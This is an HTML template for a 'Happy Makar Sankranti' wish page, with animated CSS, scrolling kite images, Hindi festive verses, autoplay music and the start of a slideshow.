<html>
<head>
<!-- I want to inform you that you do not sell this script, if you sell this script, May I give you a copyright strike. -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>》⍟☆⍣ Happy makar sankranti⍣☆⍟《</title>
    <meta name="google" value="notranslate">
    <meta property="og:type" content="Make your own wonderful wish for you loved one" />
    <meta property="og:title" content="Special Makar Sankranti की हार्दिक शुभकामनाएं" />
    <meta property="og:url" content="BDKSinghJI">
    <meta property="og:description" CLICK HERE ] />
    <meta property="og:site_name" content="मकर संक्रान्ति की हार्दिक शुभकामनाएं" />

    <meta property="og:site_img" content="https://1.bp.blogspot.com/-xEF_df6-cNg/XMbm-0_I30I/AAAAAAAAAWA/J2cue_SJmyYCu_y9pLctsb3M2wY0o239QCLcBGAs/s1600/w.png" />
    <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
    <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
    <link rel="icon" type="image/png" upsizes="32x32" href="https://1.bp.blogspot.com/-xEF_df6-cNg/XMbm-0_I30I/AAAAAAAAAWA/J2cue_SJmyYCu_y9pLctsb3M2wY0o239QCLcBGAs/s1600/w.png">
<style>
i {
        color:#f06414;
    }
input[type=name], select {
    width: 100%;
    padding: 12px 20px;
    margin: 4px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
}
.footerbtn {
 
            display: block;
            line-height: 15px;
            position: fixed;
            left:0px;
            bottom:0px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#34af23;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:95%;
 margin-left:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.footerbtn :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(0deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(0deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}

@-webkit-keyframes jello {  from, 11.1%, to {    transform: none;  }
  22.2% {    transform: skewX(-12.5deg) skewY(-12.5deg);  }
  33.3% {    transform: skewX(6.25deg) skewY(6.25deg);  }
  44.4% {    transform: skewX(-3.125deg) skewY(-3.125deg);  }
  55.5% {    transform: skewX(1.5625deg) skewY(1.5625deg);  }
  66.6% {    transform: skewX(-0.78125deg) skewY(-0.78125deg);  }
  77.7% {    transform: skewX(0.390625deg) skewY(0.390625deg);  }
  88.8% {    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);  }}

    .BDKSinghJi1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
    .BDKSinghJi2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}

.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}

hi {
 font-size:2.5em;
 user-select:none;
}

hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
 @keyframes float {
  0%,100%{ transform:none; }
  33%{ transform:translateY(-1px) rotate(-2deg); }
  66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
  0%,100%{ transform:translate(0); }
  25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
  50%{ transform:translateY(-20px) rotate(3deg) scale(1.1);  }
}

@import url(https://lh6.googleusercontent.com/proxy/YfzDH9rGEX2_6c0-ipAee-UwIRD6yJ2S-9zgBkCvqKQxaNYcbJ399-QVTehEPWRHJ-iB2IRCLJ-HGPW_wv9fmo8T2WG1qQ=s0-d);

h1 {
  animation:glow 10s ease-in-out infinite;
}



* { box-sizing:border-box; }

figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}

@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
  display:block;
  width:90%;
  line-height:1.5;
  font:900 35px 'Concert One', sans-serif;
  position:absolute;
  color:#fff;
}

@keyframes glow {
  0%,100%{ text-shadow:0 0 30px red; }
  25%{ text-shadow:0 0 30px orange; }
  50%{ text-shadow:0 0 30px forestgreen; }
  75%{ text-shadow:0 0 30px cyan; }
}

h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30px.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}x); }
h1:nth-child(8){ transform:translateZ(35px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }



.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}

.fuck{animation:infinite 1s fuck}
@keyframes rock {  0% {    transform: rotate(-2deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-2deg);  }}


h2 {
   
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 35px;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}

h3 {
    font-size: 18px;
    text-align: center;
    padding:1px;
    margin:1px;
    color: #ffffff;
   
    aanimation: fuck infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
	
	
	* {box-sizing: border-box;}
body {font-family: Verdana, sans-serif;}
.mySlides {display: none;}
img {vertical-align: middle;}

/* BDKSinghJi.in */
.BDKSinghJi-slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}

/* BDKSinghJi.in */
.BDKSinghJi-slideshow-container2 {
  max-width: 1000px;
  position: relative;
  margin: auto;
}

/* BDKSinghJi.In */
.text {
  color: #f2f2f2;
  font-size: 15px;
  padding: 8px 12px;
  position: absolute;
  bottom: 8px;
  width: 100%;
  text-align: center;
}

/* Number text (1/11 etc) */
.numbertext {
  color: #f2f2f2;
  font-size: 12px;
  padding: 8px 12px;
  position: absolute;
  top: 0;
}

/* The dots/bullets/indicators */
.dot {
  height: 15px;
  width: 15px;
  margin: 0 2px;
  background-color: #bbb;
  border-radius: 50%;
  display: inline-block;
  transition: background-color 0.6s ease;
}

.active {
  background-color: #717171;
}

/* Fading animation */
.fade {
  -webkit-animation-name: fade;
  -webkit-animation-duration: 1.5s;
  animation-name: fade;
  animation-duration: 1.5s;
}

@-webkit-keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

@keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
  .text {font-size: 11px}
	
	
}
</style>


   <style>
      body{
        background: #f8f8f8;
      
}
      .mainContainer {
max-width: 400px;
    margin: auto;
    text-align: center;
    position: relative;
    padding-right: 1px;
    padding-left: 1px;
    padding-top: 1px;
    box-shadow: 3px 3px 23px 0 rgba(0, 0, 0, 0.64);
    margin-bottom: 65px;
}


.BDKSinghJincontainer {
   
    padding-right: 30px;
    padding-left: 30px;
    padding-top: 0px;
  
}

      

.username {
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 40px;
    font-family: 'SF Espresso Shack', cursive;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}
      .fromMessage{
       
       
        
        font-size: 30px;
        
      }
      .wavetext{
        color: #3e8ed2;
        padding: 0 40px;
        animation: pulse 1s infinite;
        font-size: 32px;

      }
      .wishMessage {
        color: #3e8ed2;
        font-size: 22px;
        font-weight: bold;
        margin-top: 50px;
        text-shadow: 0px 0px 10px #00fff3
      }
      .wishMessage p{
        margin: 0.5em 0;
      }
     #formBox {
        left: 0;position: fixed;bottom: 0;display: inline-block;width: 100%;margin: 0;
      }
      #nameTextBox {border-radius: 10px;
      font-size: 21px;
      padding: 4px;
      position: fixed;
      left: 2px;
      bottom: 10px;
      height: 50px;
      width: 75%;
      display: inline-block;
      color: #FFFFFF;
      background-color:a460f4;
      border: none;
      letter-spacing: .5px;
      transition: .2s ease-out;
      cursor: pointer;
      line-height: 36px;
      outline: 0;
      text-transform: uppercase;
      vertical-align: middle;
      text-decoration: none;
      animation-duration: 4s !important;
      }
      #goButton {
      border-radius: 10px;
      font-size: 21px;
      padding: 4px;
      position: fixed;
      right: 2px;
      bottom: 10px;
      height: 50px;
      width: 20%;
      display: inline-block;
      color: #fff;
      background-color:a460f4;
      border: none;
      letter-spacing: .5px;
      transition: .2s ease-out;
      cursor: pointer;
      line-height: 36px;
      outline: 0;
      text-transform: uppercase;
      vertical-align: middle;
      text-decoration: none;
      animation-duration: 4s !important;
      }
      .enter-name input[type=name] {
  background-color:#a460f4;
  color: #fff;
    border-radius: 10px;
      box-sizing: border-box;
      border: none;
      padding: 5px;
      position: fixed;
      left: 10px;
      bottom: 100px;
      height: 50px;
      width: 70%;
      text-align: center;
      font-size: 22px;
      display: inline-block;
}
      .footerbtn {
        display: none;
        line-height: 15px;
        bottom: 10px;
        height: 40px;
        border-radius: 15px;
        box-sizing: border-box;
        padding: 5px;
        background: #34af23;
        color: #ffffff;
        font-size: 18px;
        text-align: center;
        text-decoration: none;
        box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
        
        position: fixed;
        width: 90%;
        left: 0;
        margin: 2% 5%;
      }
      .footerbtn img {
        position: relative;top:3px;
      }
      #inAdvanceTime {
        margin:20px 0 30px 0;
      }
      #inAdvanceTime p{
        color: #ae00b9;font-size: 19px;font-weight: 500;
        margin: 0;
      }
.bg{background-image:url(img/bg.gif);background-repeat:repeat}p.head.name{word-wrap: break-word;font-size:40px;font-family:sans-serif;text-shadow: 1px 1px 5px rgba(0, 0, 0, 0.5);color:#f5f5f5}input#mce-names {width: 100% !important;margin-top: 20px !important;}

<!-- This Theme edit and make by BDKSinghJi-->



.BDKSinghJi-main-greeting {
   
    max-width: 400px;
    margin: auto;
    text-align: center;
    position: relative;
    padding: 0px;
    background:#000;
    background: url("");
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    box-shadow: 3px 4px 41px 0 rgba(0, 0, 0, 0.64);
    margin-bottom: 35px
}

.BDKSinghJi-main-greeting .main_body {
    text-align: center;
    font-size: 1.3em
}
.BDKSinghJi-main-greeting .main_body .text2 {
    padding: 10px;
    font-size: 20px
}
.BDKSinghJi-main-greeting .text {
    color: #405d9b;
    letter-spacing: 1px;
    font-weight: 600;
    padding: 0px 10px;
    text-align: center;
}
.BDKSinghJi-main-greeting .pp-img {
    max-width: 400px;
    margin-bottom: 10px;
    box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.64);
}

.BDKSinghJi-main-greeting .text_gradient {
    margin: 5px auto;
    font-weight: 700;
    font-size: 24px;
    color: #b50dae;
}



    </style>

<!---make by BDKSinghJi --->



</head>
<body class="bg" style=" background-image : url('')";>

<br>
<marquee class="BDKSinghJi1" behavior="scroll" direction="up" scrolldelay="5">
  <img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br>
  <img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br>
</marquee>
<marquee class="BDKSinghJi2" behavior="scroll" direction="down" scrolldelay="5"><br>
  <img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br><img src="https://1.bp.blogspot.com/-_UHDeYRB4Vc/X-sYVqm3o-I/AAAAAAAAAY4/gJkGORXLLasVw-Y_KOK24Wzz1fbQpvxZACLcBGAsYHQ/s320/transparent-kite-sport-kite-purple-kite-sports-5de78be2622778.851391261575455714402.png"  width="35px"/><br><br>
</marquee>
<center>
 <div class="BDKSinghJincontainer">

    <div class="BDKSinghJi-main-greeting">

<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color:no; color: white; font-weight: bold; padding-top: 0px; padding-bottom: 0px; font-size: 18;text-align:center; ">
<font color="white"> <p id="BDKSinghJi" style="color: #000;"></p>
</font>
</Div>
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color:no; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
<h2 class="font-effect-neon" align="center" id="BDKSinghJi-show-name"></h2>
</Div>     
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color: no; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
</font>
</div></div></div>       
</center>
<center>
<img src="https://1.bp.blogspot.com/-phvKXs-0vV4/X-yPqFci8wI/AAAAAAAAGWQ/mBWAOHqT9mkl0Oe17bLIfeHjzFtEaiOrQCLcBGAsYHQ/s320/20201230_195545.png"style="animation: tada 4.5s infinite" class="swing"   width="80%"/>
</center>

</br><center >
        <div class="font-effect-neon"><p class="fromMessage" id="BDKSinghJi-fromMessage"></p>
</center>
</div>
</div>       
</br>
<center style="margin-top: -72px;">
<img src="https://img.pngio.com/happy-makar-sankranti-png-2-png-image-makar-sankranti-png-350_244.png"width="80%" 
/>
   </center>                                                 
<center>

<br>
<center>
<div class="BDKSinghJiSlides fade"> <img src="https://freepngimg.com/thumb/makar_sankranti/96509-makar-sankranti-kite-cartoon-line-for-happy-decoration.png"  width="80%"/><br><br>
 </div>
</center>


</br>
<div style="background-color: cyan; border-radius: 17px; border: 0px solid rgb(0 , 0 , 0); box-shadow: rgba(0 , 0 , 0 , 0.2) 5px 5px 5px; color: black; font-family: arial , sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
  टिल हम हैं और गुड आप, मिठाई हम हैं और मिठास आप,</b></marquee>
</div>
<div style="background-color: red; border-radius: 17px; border: 0px solid rgb(0 , 0 , 0); box-shadow: rgba(0 , 0 , 0 , 0.2) 5px 5px 5px; color: white; font-family: arial , sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
  साल के पहले त्यौहार से हो रही है शुरुवात,</b></marquee>
</div>
<div style="background-color: yellow; border-radius: 17px; border: 0px solid rgb(0 , 0 , 0); box-shadow: rgba(0 , 0 , 0 , 0.2) 5px 5px 5px; color: black; font-family: arial , sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
  आपको हमारी तरफ से ढेर सारी मुराद</b></marquee>
</div>
<div style="text-align: center;">
<strong><span style="background-color: red; color: white; font-family: tahoma , arial , helvetica , sans-serif; font-size: 20pt;">&nbsp;☆✪Happy Makar Sankranti✪☆</span></strong></div>
</div>
</BR>
<audio controls autoplay="yes" mobile="yes" src="https://mobcup.net/d/1r1ig7z1/mp3" loop></audio><br/></center>
  <script type="text/javascript">
    function PlaySound() {
          var sound = document.getElementById("audiocracker");
          sound.play()
      }
    </script> 
  </center>

<br />

</br>


<center>
<!-----------Slideshow--------------->

<div class="slideshow-container">

<div class="mySlides fade">

  
  <div class="numbertext"></div>

  <img src="https://freepngimg.com/download/makar_sankranti/96848-makar-sankranti-text-for-happy-party-2020.png" style="width:80%; ">

  <div class="text"></div>

</div>


<div class="mySlides fade">

  <div class="numbertext"></div>

